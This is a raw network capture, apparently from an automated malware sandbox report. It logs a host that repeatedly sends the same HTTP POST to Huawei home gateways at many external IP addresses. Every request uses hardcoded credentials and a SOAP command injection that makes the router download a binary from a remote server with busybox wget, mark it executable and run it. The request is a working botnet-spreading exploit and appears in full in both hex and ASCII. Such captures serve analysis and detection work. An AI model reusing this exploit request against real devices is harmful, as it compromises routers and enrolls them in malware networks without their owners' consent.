                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2151192.168.2.155556094.216.128.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120765924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2152192.168.2.153279645.149.23.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120878935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2153192.168.2.154906045.99.204.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120878935 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2154192.168.2.153594845.80.207.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120929956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2155192.168.2.155587045.74.121.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120937109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2156192.168.2.1541152121.247.37.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120939016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2157192.168.2.1548100122.125.62.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.121450901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2158192.168.2.1548698102.227.245.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.121485949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2159192.168.2.1543536138.216.236.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.122684956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2160192.168.2.1542716157.79.126.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.123246908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
